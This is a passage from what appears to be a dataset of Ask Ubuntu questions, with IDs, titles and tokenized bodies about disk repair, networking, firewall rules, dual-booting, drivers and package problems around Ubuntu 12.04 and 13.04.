: still waiting on my chance to get onto the windows system ( my dad 's laptop and he 's busy using it ) . i have discovered the command fsck -- which apparently is roughly equivalent to chkdsk in a linux environment . this is the result i get : $ sudo fsck /dev/sdb1 fsck from util-linux 2.20.1 e2fsck 1.42.5 ( 29-jul-2012 ) ext2fs_open2 : bad magic number in super-block fsck.ext2 : superblock invalid , trying backup blocks ... fsck.ext2 : bad magic number in super-block while trying to open /dev/sdb1 the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device > i repeated the fsck using e2fsck and the -b 8193 modifier , and got an identical result . is this information helpful to anyone ? edit : i have been unable to use chkdsk on a windows environment to recover the disk . i did something to it -- i 'm not sure what . but , the data lost is not life-ending , thankfully . so , i will continue to investigate this issue on my own , and if i come up with a solution i will repost this question , and all relevant information . i thank you all for your help , have a great night ! : - )
332264	13.04 - more than four workspace shortcuts in gnome flashback ( no effects )	i 'm using gnome flashback ( no effects ) on ubuntu 13.04 and i 've got six workspaces however when entering system settings - > keyboard - > shortcuts - > navigation i only see options to address the initial four . it used to be options up to 12 workspaces there and as i certainly do n't need that much , i want to have at least enough for the amount currently active . how can i restore or add more shotcuts specifically to navigate and move windows to workspace 5 and 6 ?
332266	how can i see devices if i am using ubuntu in `` try ubuntu '' mode ?	i am a novice at ubuntu , and have been unable to find the following information : i am using ubuntu in the `` try ubuntu '' rather than the installed mode . when i use the file manager function , i do n't see my hard drive . in fact i see no devices at all listed . my goal is to use ubuntu to go into my windows/system32 folder and modify a file there . how can i see that folder in ubuntu ?
332268	install unbuntu 13.04 alongside windows xp pro - no option	i 'm a newb to linux and i 'm trying to install ubuntu along side windows xp pro from a dvd . i 've read the installation guide but i do n't have an option for installing alongside windows . i have : replace microsoft windows xp professional with ubuntu encrypt the new ubuntu installation for security use lvm with the new ubuntu installation something else if i check `` something else '' , i see 2 lines that say /dev/sda and /dev/sda1 . the first one is blank and the second is ntfs and says size-80015 mb , used-unknown , system-microsoft windows xp professional . this is an 80gb hard drive . i 'm guessing that i 'm not getting `` install alongside windows '' option because the drive is 1 partion using all the space . i 'm could be wrong . is dual-boot the same thing as installing alongside ? i mean , you can only boot one os at a time right ? any ideas how i should proceed ? i appreciate any help . i ca n't wait to get ubuntu running so i can start crankin ' on some ruby apps .
332269	how can i remove icecast2 competely	i installed icecast2 for broadcasting ( online radio ) . but complexity on its settings did suffered me . i want to remove it completely . i tried with sudo apt-get purge icec* system was start to delete unrelated files , and i stopped it with ctrl+c . so my ubuntu desktop had gone and i reinstalled unity-2d again . how can i remove this program and its plugins without affecting other programs ?
332274	unable to get updates , e-mail and internet access , ubuntu 12.04 lts	i am using a wireless connection . the connection icon in the upper right hand corner of the screen indicates i am indeed connected , yet update manager , e-mail connections and internet access fail . os is ubuntu 12.04 lts . i am using my work computer to access this help site hoping some direction for these issues . i am new to ubuntu and linux as a whole . the last update indicated is july 30th . that said , any suggestions for diagnostic steps or any other helpful directions would be appreciated . ping -c4 4.2.2.2 and route | grep default did n't return anything . ifconfig : eth0 link encap : ethernet hwaddr 00:22:4d:50 : b3:9e up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:20 memory : f0400000-f0420000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:3384 errors:0 dropped:0 overruns:0 frame:0 tx packets:3384 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:187028 ( 187.0 kb ) tx bytes:187028 ( 187.0 kb ) wlan0 link encap : ethernet hwaddr 6c:62:6d:23 : d0 : c0 inet addr:192.168.0.5 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :6e62:6dff : fe23 : d0c0/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:32293 errors:0 dropped:0 overruns:0 frame:0 tx packets:145 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2382888 ( 2.3 mb ) tx bytes:10990 ( 10.9 kb ) ip addr : 1 : lo : < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc pfifo_fast state down qlen 1000 link/ether 00:22:4d:50 : b3:9e brd ff : ff : ff : ff : ff : ff 3 : wlan0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc mq state up qlen 1000 link/ether 6c:62:6d:23 : d0 : c0 brd ff : ff : ff : ff : ff : ff inet 192.168.0.5/24 brd 192.168.0.255 scope global wlan0 inet6 fe80 : :6e62:6dff : fe23 : d0c0/64 scope link valid_lft forever preferred_lft forever iwconfig : eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' cgnetwork '' mode : managed frequency:2.437 ghz access point : a0:21 : b7 : f7 : ef : db bit rate=72.2 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : on link quality=59/70 signal level=-51 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:13 invalid misc:6 missed beacon:0 ping and dconf read did not yield any results . iptables -l : chain input ( policy drop ) target prot opt source destination ufw-before-logging-input all -- anywhere anywhere ufw-before-input all -- anywhere anywhere ufw-after-input all -- anywhere anywhere ufw-after-logging-input all -- anywhere anywhere ufw-reject-input all -- anywhere anywhere ufw-track-input all -- anywhere anywhere chain forward ( policy drop ) target prot opt source destination ufw-before-logging-forward all -- anywhere anywhere ufw-before-forward all -- anywhere anywhere ufw-after-forward all -- anywhere anywhere ufw-after-logging-forward all -- anywhere anywhere ufw-reject-forward all -- anywhere anywhere chain output ( policy drop ) target prot opt source destination ufw-before-logging-output all -- anywhere anywhere ufw-before-output all -- anywhere anywhere ufw-after-output all -- anywhere anywhere ufw-after-logging-output all -- anywhere anywhere ufw-reject-output all -- anywhere anywhere ufw-track-output all -- anywhere anywhere chain ufw-after-forward ( 1 references ) target prot opt source destination chain ufw-after-input ( 1 references ) target prot opt source destination ufw-skip-to-policy-input udp -- anywhere anywhere udp dpt : netbios-ns ufw-skip-to-policy-input udp -- anywhere anywhere udp dpt : netbios-dgm ufw-skip-to-policy-input tcp -- anywhere anywhere tcp dpt : netbios-ssn ufw-skip-to-policy-input tcp -- anywhere anywhere tcp dpt : microsoft-ds ufw-skip-to-policy-input udp -- anywhere anywhere udp dpt : bootps ufw-skip-to-policy-input udp -- anywhere anywhere udp dpt : bootpc ufw-skip-to-policy-input all -- anywhere anywhere addrtype match dst-type broadcast chain ufw-after-logging-forward ( 1 references ) target prot opt source destination log all -- anywhere anywhere limit : avg 3/min burst 10 log level warning prefix `` [ ufw block ] `` chain ufw-after-logging-input ( 1 references ) target prot opt source destination log all -- anywhere anywhere limit : avg 3/min burst 10 log level warning prefix `` [ ufw block ] `` chain ufw-after-logging-output ( 1 references ) target prot opt source destination log all -- anywhere anywhere limit : avg 3/min burst 10 log level warning prefix `` [ ufw block ] `` chain ufw-after-output ( 1 references ) target prot opt source destination chain ufw-before-forward ( 1 references ) target prot opt source destination ufw-user-forward all -- anywhere anywhere chain ufw-before-input ( 1 references ) target prot opt source destination accept all -- anywhere anywhere accept all -- anywhere anywhere state related , established ufw-logging-deny all -- anywhere anywhere state invalid drop all -- anywhere anywhere state invalid accept icmp -- anywhere anywhere icmp destination-unreachable accept icmp -- anywhere anywhere icmp source-quench accept icmp -- anywhere anywhere icmp time-exceeded accept icmp -- anywhere anywhere icmp parameter-problem accept icmp -- anywhere anywhere icmp echo-request accept udp -- anywhere anywhere udp spt : bootps dpt : bootpc ufw-not-local all -- anywhere anywhere accept udp -- anywhere 224.0.0.251 udp dpt : mdns accept udp -- anywhere 239.255.255.250 udp dpt:1900 ufw-user-input all -- anywhere anywhere chain ufw-before-logging-forward ( 1 references ) target prot opt source destination chain ufw-before-logging-input ( 1 references ) target prot opt source destination chain ufw-before-logging-output ( 1 references ) target prot opt source destination chain ufw-before-output ( 1 references ) target prot opt source destination accept all -- anywhere anywhere accept all -- anywhere anywhere state related , established ufw-user-output all -- anywhere anywhere chain ufw-logging-allow ( 0 references ) target prot opt source destination log all -- anywhere anywhere limit : avg 3/min burst 10 log level warning prefix `` [ ufw allow ] `` chain ufw-logging-deny ( 2 references ) target prot opt source destination return all -- anywhere anywhere state invalid limit : avg 3/min burst 10 log all -- anywhere anywhere limit : avg 3/min burst 10 log level warning prefix `` [ ufw block ] `` chain ufw-not-local ( 1 references ) target prot opt source destination return all -- anywhere anywhere addrtype match dst-type local return all -- anywhere anywhere addrtype match dst-type multicast return all -- anywhere anywhere addrtype match dst-type broadcast ufw-logging-deny all -- anywhere anywhere limit : avg 3/min burst 10 drop all -- anywhere anywhere chain ufw-reject-forward ( 1 references ) target prot opt source destination chain ufw-reject-input ( 1 references ) target prot opt source destination chain ufw-reject-output ( 1 references ) target prot opt source destination chain ufw-skip-to-policy-forward ( 0 references ) target prot opt source destination drop all -- anywhere anywhere chain ufw-skip-to-policy-input ( 7 references ) target prot opt source destination drop all -- anywhere anywhere chain ufw-skip-to-policy-output ( 0 references ) target prot opt source destination drop all -- anywhere anywhere chain ufw-track-input ( 1 references ) target prot opt source destination chain ufw-track-output ( 1 references ) target prot opt source destination chain ufw-user-forward ( 1 references ) target prot opt source destination chain ufw-user-input ( 1 references ) target prot opt source destination chain ufw-user-limit ( 0 references ) target prot opt source destination log all -- anywhere anywhere limit : avg 3/min burst 5 log level warning prefix `` [ ufw limit block ] `` reject all -- anywhere anywhere reject-with icmp-port-unreachable chain ufw-user-limit-accept ( 0 references ) target prot opt source destination accept all -- anywhere anywhere chain ufw-user-logging-forward ( 0 references ) target prot opt source destination chain ufw-user-logging-input ( 0 references ) target prot opt source destination chain ufw-user-logging-output ( 0 references ) target prot opt source destination chain ufw-user-output ( 1 references ) target prot opt source destination nm-tool : networkmanager tool state : disconnected - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rt2800usb state : disconnected default : no hw address : 6c:62:6d:23 : d0 : c0 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000e state : unavailable default : no hw address : 00:22:4d:50 : b3:9e capabilities : carrier detect : yes wired properties carrier : off
332278	no module named 'kernmagic ' in ipython	i 'm running ubuntu 13.04 and upon starting up ipython ( 0.13.2 ) , i get this warning : importerror : no module named kernmagic i 've tried re-installing ipython and that did n't work . does anyone have any ideas on how to get rid of the warning ? thanks !
332281	bluetooth not detecting any devices in ubuntu 13.04	i 've been having issues with bluetooth ever since installing ubuntu 13.04 . while the bluetooth service seems to be correctly started , it can not detect , nor be detected by any devices . please let me know what sort of output could help with debugging this issue . i believe it has to do with the error being displayed : dmesg | grep blue 729 : [ 1.682131 ] bluetooth : core ver 2.16 731 : [ 1.682148 ] bluetooth : hci device and connection manager initialized 732 : [ 1.682155 ] bluetooth : hci socket layer initialized 733 : [ 1.682157 ] bluetooth : l2cap socket layer initialized 734 : [ 1.682162 ] bluetooth : sco socket layer initialized 741 : [ 1.694898 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 742 : [ 1.694902 ] bluetooth : bnep filters : protocol multicast 743 : [ 1.694909 ] bluetooth : bnep socket layer initialized 744 : [ 1.696741 ] bluetooth : rfcomm tty layer initialized 745 : [ 1.696757 ] bluetooth : rfcomm socket layer initialized 746 : [ 1.696759 ] bluetooth : rfcomm ver 1.11 811 : [ 2.276270 ] bluetooth : ca n't load firmware , may not work correctly 903 : [ 24.221864 ] bluetooth : ca n't load firmware , may not work correctly 918 : [ 29.592931 ] bluetooth : ca n't load firmware , may not work correctly 933 : [ 35.218616 ] bluetooth : ca n't load firmware , may not work correctly
332284	how to check if the following error is still ocurring ?	the question is pretty self explanatory , the screenshot attached shows the error i 'm talking about . by the way , i just installed ubuntu 13.04 with a fresh install . sudo lspci -nn output : https : //dl.dropboxusercontent.com/u/82342689/output1.txt file /var/log/udev : https : //dl.dropboxusercontent.com/u/82342689/udev file /var/log/dmesg : https : //dl.dropboxusercontent.com/u/82342689/dmesg file /var/log/xorg.0.log : https : //dl.dropboxusercontent.com/u/82342689/xorg.0.log output of libgl_debug=verbose glxinfo : https : //dl.dropboxusercontent.com/u/82342689/output2.txt
332292	iptables forwarding rule	i entered the following rule into my iptables : sudo iptables -t nat -a prerouting -p tcp -- destination-port 80 -j redirect -- to-ports 1337 and then when i went to remove it , i could n't find it anywhere with iptables -l why is this , and how can i remove it ? thank you ! edit : i have ufw installed , by the way .
332293	how can i set kernel parameters for a specific installation involving os-prober ?	beside ubuntu i also have an arch installation . i plan to maintain the grub-configuration from my ubuntu . the whole update-grub - grub-mkconfig - os-prober-chain works just fine . i know i can set grub_cmdline_linux for options to be passed to the kernel in /etc/default/grub . but how would i possibly specify that per kernel / kernels on a specific partition ? neat would be having a little text-file beside a kernel image that is evaluated by the tool-chain , but i guess that 's some serious hacking through the chain .
332294	how to get the canon 8400f scanner to function with ubuntu 13.04 ( 64bit )	i have been unable to find advice on how to get the canon 8400f scanner to function with the 64 bit version of ubuntu 13.04 . the scanner works with window 7 ( 64 bit ) . which would mean that the connections are ok . this post canon pixia mp 230 implied some hope , but the advice did not work . based on a search of the ubuntu forum . the few posts are old and basically the response is that this scanner is `` unsupported '' in linux . looked here - > supported scanners . the webpage implied that i was out of luck . ( had to delete some links , not enough reputation points ) any hope ?
332295	need more info on kvm disabled message	i just installed ubuntu 13 as a dual boot with win 7 . i just installed the nvidia proprietary drivers for my geforce . upon reboot i received the kvm disabled message . i googled that and see various answers , but none to my satisfaction . i do not wish to `` get rid of '' an error , if i do n't know what it is exactly . what is it ? what will it affect ? and if i where to disable it in bio 's how will that affect my windows ? thank you in advance for your reply .
332298	if-up.d script not working ?	i 'm trying to make nat routing persistent on my ubuntu 12.04 ec2 instance ( for openvpn ; currently i need to run it every time after boot ) : ubuntu @ vpn : ~ $ cat /etc/network/if-up.d/vpn-routing iptables -t nat -a postrouting -s 10.8.0.0/24 -o eth0 -j masquerade but it 's not working : ubuntu @ vpn : ~ $ sudo iptables -t nat -l postrouting chain postrouting ( policy accept ) target prot opt source destination any ideas why ? does it matter that i have ufw enabled ? i did n't see anything interesting/relevant in syslog ( though i was n't sure what to look for ) . thanks in advance .
332299	where to install a program ?	i want to download and run this , http : //labs.bittorrent.com/experiments/sync.html but i 'm not 100 % sure where to run it from . i 've downloaded it to my downloads folder in my home directly but i 've heard that it 's bad form to run things from your home directory .
332301	how to find docs for apt installed packages	i 'm wandering if there is a universal way to find docs for apt installed packages , or at least find out what they do . sometimes i run into packages of which i have no idea at all , but i can not figure out what they do either locally or online . for instance , what does the package libaccounts-glib0 do ? if it is for web account plugins , i 'll simply remove it . if it is for core accounts services , removing it will get me into trouble , i guess . there is not even a one-line description to help me decide .
332304	no suitable windowing system found , exiting . open office 4 ubuntu	i am running open office 4 soffice headless on ubuntu 64 bit on my vps with command line . /usr/bin/soffice -accept=socket , host=localhost , port=8100 ; urp ; staroffice.servicemanager -norestore -nofirststartwizard -nologo -headless its exiting with an error . no suitable windowing system found , exiting .
332306	sudoing my own bash scripting	okay , so i have my scripts in ~/bin/ , and they are added to the path normally . however , when i prefix them with sudo , they are not in the path . i figure this is because they 're not in the path for root which sudo is using . how can i change it so sudo also looks in my path ? or alternatively , so that my bin is in the root path ? thanks !
332307	no wireless connections	first of all , i am a complete newbie to ubuntu , and barely know anything about it , so a lot of detail would be lovely . whenever i open the network list it shows one wired connection , which i do not use , but no wireless . do i have to manually add in the information from the `` add '' button , or is there a way i can make it do a sort of scan for networks in the general area ? the wireless connection will connect on my windows os , which i am on now , but not on ubuntu . all help is appreciated ! ifconfig result : eth0 link encap : ethernet hwaddr e0 : db:55:84 : dc:73 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:228 errors:0 dropped:0 overruns:0 frame:0 tx packets:228 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:19306 ( 19.3 kb ) tx bytes:19306 ( 19.3 kb ) iwconfig result : eth0 no wireless extensions . lo no wireless extensions .
332309	unable to access window controls on maximized windows	i installed ubuntu 13.04 but an annoying error has been bothering me . i formatted my pc to get rid of it , but about 2 hours after the fresh install , it came back . the thing is that the title bar of any window , at the upper-left side , where the `` close , minimize and maximize '' buttons are , disappears when the mouse cursor is set over them . this disables the possibility of using them when the windows is maximized ( full screen ) but not when it 's not . but it is very annoying . the second screenshot may help show what i 'm trying to say ( notice the cursor and what happens when i try to click the close button on any window ) this is the problem : i 'm aware that there is a similar question answered on this site , but the thing is that the solution in that post involves using unity2d , which was removed in ubuntu 13.04 i hope there 's a way to fix it .
332312	dual gpu and ubuntu , can it be ?	hello linux / ubuntu world ! i just have a question that im sure has been asked / seeked before ! i have a desktop with dual nvidia 8800gt's i use 3 of the 4 dvi ports 2 smaller screens and one large screen is there a way to configure these to work like they would in windows ? ie drag stuff from one to the other , pop a window in one and one in the other etc . please tell me it can be done lol .
332315	how to read and write hfs+ journaled external hdd in ubuntu without access to os x ?	i have a hfs+ journaled external hard-drive and need to be able to write to it on ubuntu . i do n't have access to my mac , it 's thousands of miles away and i wo n't have access to it for three months . can anything be done without losing the data on the hdd ?
332316	how to run webgl with software rendering on ubuntu 12.04	my graphics card support opengl 1.4 only . i had download mesalib7.11 and build completed , i can force set a link mesallvm.so - > libgl.so.1.5.0 , then webgl can work fine on firefox 23 . but i have try `` chrome : flag '' - > press ctrl + f and type ” rendering list “ , “override software rendering list” should come up , now click on enable and restart the browser . the webgl still not working . would you please help to tell me how to run webgl with software rendering on chrome .
332321	how can i recursively copy files without overwriting existing permissions ?	when i copy files from one directory to another , the directory permissions get reset ( e.g : from 0755 to 0775 ) , and this causes problems , forcing me to go back and manually reset directory permissions . i 'm currently doing cp -r /source/directory /destination/directory i want to copy all of the files and new directories , but not overwrite permissions of existing directories .
332327	how to install ubuntu 13.04	i have bit of a problem . i have no idea how to install the ubuntu 13.04 . the only thing i have is usb . my machine is intel i3 with windows 8 already installed but i am kind of tired of windows so i decided to make my 8 gb ram 1 tb hd . a dual boot . any help is appreciated ! : )
332328	how to install pure-ftpd and configure ftp server to transfer files ?	i want to install pure-ftpd and configure ftp server for transfer files . how can i do this ? i am using ubuntu 13.04 .
332336	how do i dual boot windows given that i have already installed ubuntu 12.04 ?	all the literature i can find about dual booting windows and ubuntu suggests that windows be installed first , then ubuntu , since the ubuntu install software has an option that streamlines this whole process . i already installed ubuntu and have been using it for a few months , and i do n't want to just wipe everything in order to install windows and then reinstall ubuntu . i am also a bit new at this , so i do n't know the appropriate way to partition my drive to install windows manually . is there a way to dual boot windows easily given an existing ubuntu install ? i have combed the internet for a good guide on this topic but i have n't found anything yet that i understand . what i am really looking for is a simple guide that does n't involve advanced terminology or lingo ( picture based , even , if possible ) . i am slowly learning what all this linux terminology means , but i am still a beginner , and am nowhere near able to understand everything that i apparently have to to accomplish this task .
332342	how to add 'awesome ' selection in lightdm ?	i installed awesome using apt-get , and after installation finished , i logged out to lightdm . but there is no selection for awesome , only unity and subtle ( since i recently installed subtle ) . what should i do , in order to make awesome selection is available ? there were no errors while installing awesome .
332348	gma 3150 . black screen before login	i tried to install ubuntu 12.04 , 13.04 and mint 15 , but i got the same bug . it 's a lanix lt netbook with a gma 3150 graphic card . when i boot from the livecd ( on a usb ) works perfectly . but when the installation ends and i reboot , i got a black screen after the grub . nevertheless , i can hear the sound of the login 's screen and increase the bright . i installed the intel 's privative graphic driver ( using nomodeset ) but still the same thing . when booting with nomodeset i can see everything , but i ca n't select the correct resolution ( only gives me 1024x700 and 800x600 ) and without graphic acceleration . i runned lspci command at the terminal and detects the intel driver . there must be a problem when installing the graphic driver , i suppose . can someone tell me what can i do ? , please . pd : sorry if i got bad grammar .
332354	c graphics xcb error - ubuntu 12.04	the below code gives me an output . but after 4 to 5 key presses , it crashes resulting in a core dump . please help us ascertain the error and method to resolve this issue . # include < graphics.h > int main ( void ) { int gd=detect , gm=vgamax , i , x , button , c ; static y=20 ; char outstr [ 60 ] ; initgraph ( & gd , & gm , 0 ) ; while ( ! kbhit ( ) ) { c=getch ( ) ; if ( c == 120 ) break ; sprintf ( outstr , `` % d '' , c ) ; outtextxy ( 20 , y , outstr ) ; y = y+20 ; } outtextxy ( 50 , 40 , `` out of while loop '' ) ; getch ( ) ; closegraph ( ) ; return 0 ; } the error that i received : [ xcb ] unknown sequence number while processing queue [ xcb ] most likely this is a multi-threaded client and xinitthreads has not been called [ xcb ] aborting , sorry about that . a.out : ../../src/xcb_io.c:274 : poll_for_event : assertion ` ! xcb_xlib_threads_sequence_lost ' failed . aborted ( core dumped )
332355	how to uninstall the deleted ubuntu from windows 8 ?	i bought a windows 8 pc but then realised need of ubuntu so i installed it using wubi but then i accidentally formatted the partition of ubuntu , now i find that i am unable to uninstall ubuntu from my system meanwhile i tried installing it again but then it showed 3 os windows 8 and 2 ubuntu . can anybody help me out ?
332359	trouble connecting to internet	i have a laptop with lubuntu 13 . usually it 's not connected ( i do n't have wifi atm ) but sometimes try to connect it through the wire i use for my main machine . however , there seems to be a problem with this . simply connecting the cord does not seem to automatically connect the computer to the internet , and restarting it a few times does nothing either . i have been able to get a connection in the past when i first updated the system and installed all the programs i use , and also subsequently once . the first time it seemed to connect instantly , and the second time only after several reboots . today i tried to connect it but nothing happened even after some reboots . i have tried service network-manager restart and it did n't work . so i 'm looking for some commands i can run to diagnose the problem and fix it .
332361	software properties kde is not opening after installation !	though i install software properties kde its not opening and showing an message , please run this software with administrative rights . to do so , run this program with kdesudo . even though i am the admin .
332370	switch raring to systemd	i know that raring use upstart as init system . however i 'm wondering if it 's possible to switch to systemd , as we can do it on debian . i 've found this ppa : systemd : martin pitt but the systemd version proposed is old . has anyone installed systemd on raring ? how ?
332374	using geany ide on ubuntu	i am new to linux , i would like to try image processing using c. i am planning to use geany . my questions are : can geany compile these programs ? can i convert the same to a binary file to load it on to raspberry pi ?
332375	unable to locate package libglut3-dev	i was not able to download the software libglut3-dev in my ubuntu 12.04.2 i was behind a proxy . i was getting the following error . sudo apt-get install libxi-dev libxmu-dev libglut3-dev [ sudo ] password for sai : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libglut3-dev i changed the sources.list file , but it remains the same . how can i install this package ?
332377	trying to flash ubuntu touch on nexus 4	i keep getting this error after i run phablet-flash cdimage-touch -b error : phablet-flash : [ errno 2 ] no such file or directory : u'/home/dom/downloads/phablet-flash/ubuntu-touch/20130808.lock'
332379	typeerror : __init__ ( ) takes at least 4 arguments ( 3 given )	i m working with viewlets . my idea is to override the default plone site with my things like my own logo , my menus , my address bar , etc . i used the default viewlet code in to my own createpictmenu.py file . the code which is in brundelre3/eggs/plone.app.layout-2.3.4-py2.7.egg/plone/app/layout/viewlets/common.py - > class logoviewlet ( viewletbase ) : my createpictmenu.py looks like this class bdrmenuview ( logoviewlet ) : template = viewpagetemplatefile ( 'templates/main_page.pt ' ) def __init__ ( self , context , request , view , manager=none ) : super ( viewletbase , self ) .__init__ ( context , request ) self.__parent__ = view self.context = context self.request = request self.view = view self.manager = manager def main_page ( self ) : return self.template ( ) here logoviewlet is the class which i inherit from common.py which is under eggs folder . it successfully replacing the plone.logo with my menus . i saw it under localhost:8086/brundelre3/ @ @ manage-viewlets . but when i run my project `` localhost:8086/brundelre3/main_page.html '' its showing error error message : 2013-08-14 11:18:19 error zope.siteerrorlog 1376459299.050.254417887359 http : //localhost:8086 /brundelre3/main_page.html traceback ( innermost last ) : module zpublisher.publish , line 115 , in publish module zpublisher.baserequest , line 501 , in traverse module zpublisher.baserequest , line 346 , in traversename module zpublisher.baserequest , line 116 , in publishtraverse module zope.component._api , line 120 , in querymultiadapter module zope.component.registry , line 238 , in querymultiadapter module zope.interface.adapter , line 532 , in querymultiadapter typeerror : __init__ ( ) takes at least 4 arguments ( 3 given ) can anyone tell whats wrong with this code.thanks in advance regards nirmala sudhir
332385	ctrl+alt+f1 wo n't login	i 'm having a `` running in low-graphics mode '' that wo n't ever take me to a login screen . when i enter the kill command , enter my login and password , it flashes a date and time stamp for an instant , then returns me to the `` enter login '' text line . i ca n't boot into recovery mode by booting with shift , or even through the bios . is there any way i can fix this without a boot disk ?
332386	error with debian package installation	i have downloaded the deb package for vlc media player to install it in offline mode . but when i try to install by double clicking on it , i 'm getting the following error : dependacy is not satisfiable : vlc-nox i 'm using ubuntu-13.04-desktop-amd64 . i ca n't try apt-get method as i do n't have an internet connection .
332393	what should i do if i delete the boot folder	i change the partion of the system with geparted in the liveusb , ignoring some warning . then reboot , 'grub > ' appears but i can not find the boot or grub folder anymore . afterward , i reinstall ubuntu and i pay a high price . then i want to learn a better way rather than reinstall when one comes into this case .
332394	thinkpad t420 display port not detected	i 'm trying to connect an external monitor to my lenovo t420 using the displayport but it 's not working . if i connect it via vga it works fine , but the image on the monitor is lacking sharpness and it 's flickering ( the cause of that i discovered to be some interference in the vga output ) . so , i want to connect my external monitor using displayport , but when i do so , i get no image on it . and when i run the xrandr command , i do n't see any display port : $ xrandr screen 0 : minimum 320 x 200 , current 3520 x 1200 , maximum 32767 x 32767 lvds1 connected 1600x900+0+300 ( normal left inverted right x axis y axis ) 309mm x 174mm 1600x900 60.0*+ 40.0 1440x900 59.9 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1920x1200+1600+0 ( normal left inverted right x axis y axis ) 518mm x 324mm 1920x1200 60.0*+ 1920x1080 59.9 1600x1200 60.0 1680x1050 60.0 1280x1024 75.0 72.0 60.0 1440x900 75.0 59.9 1024x768 75.1 70.1 60.0 800x600 72.2 75.0 60.3 640x480 72.8 75.0 66.0 60.0 720x400 70.1 when running lspci -v i can see both my graphic cards : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo device 21d0 flags : bus master , fast devsel , latency 0 , irq 46 memory at f1400000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 6000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 ... . 01:00.0 vga compatible controller : nvidia corporation gf119m [ quadro nvs 4200m ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo device 21d0 flags : fast devsel , irq 11 memory at f0000000 ( 32-bit , non-prefetchable ) [ disabled ] [ size=16m ] memory at c0000000 ( 64-bit , prefetchable ) [ disabled ] [ size=256m ] memory at d0000000 ( 64-bit , prefetchable ) [ disabled ] [ size=32m ] i/o ports at 5000 [ disabled ] [ size=128 ] expansion rom at f1000000 [ disabled ] [ size=512k ] capabilities : < access denied > in bios my settings are `` discrete graphics '' and os detection disabled . any idea what i could do to make the display port work ? i 'm running ubuntu 13.04 . thanks !
332403	how to encode video raw frames , set frame rate and display it through vlc ?	currently i am running one server program in that i am capturing raw video frames using v4l2 . now , i want to stream it using rtp and display it through vlc . what i understood is , i need to encode raw frames in a particular format and then i need to stream via rtp . i want encode the videos into h.264 format . can you please guide me as to how to encode the raw video frames to h.264 format ? can you please suggest me how to fix frame rate in my code to 30 fps as h.264 ? please help me and guide me how to stream and display it through vlc .
332404	grub error : ubuntu and windows 8 = error invalid signature	i 've recently installed ubuntu 13on a partition with windows 8 but i ca n't return on the windows loader . i got error invalid signature when i select windows 8.however ubuntu works perfectly . i 've search on internet and tested a solution with os-proper but it 's change nothing : : ~ $ sudo os-prober grub-probe : error : unknown filesystem . /dev/sda1 : windows 8 ( loader ) : windows : chain : ~ $ sudo update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-3.8.0-27-generic found initrd image : /boot/initrd.img-3.8.0-27-generic found linux image : /boot/vmlinuz-3.8.0-26-generic found initrd image : /boot/initrd.img-3.8.0-26-generic found linux image : /boot/vmlinuz-3.8.0-19-generic found initrd image : /boot/initrd.img-3.8.0-19-generic found memtest86+ image : /boot/memtest86+.bin grub-probe : error : unknown filesystem . found windows 8 ( loader ) on /dev/sda1 /usr/sbin/grub-probe : error : unknown filesystem . done for more details on the configuration : ~ $ sudo fdisk -l disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x3f78334c device boot start end blocks id system /dev/sda1 * 2048 715057151 357527552 7 hpfs/ntfs/exfat /dev/sda2 715059200 1151722887 218331844 7 hpfs/ntfs/exfat /dev/sda3 1151723518 1465147391 156711937 5 extended partition 3 does not start on physical sector 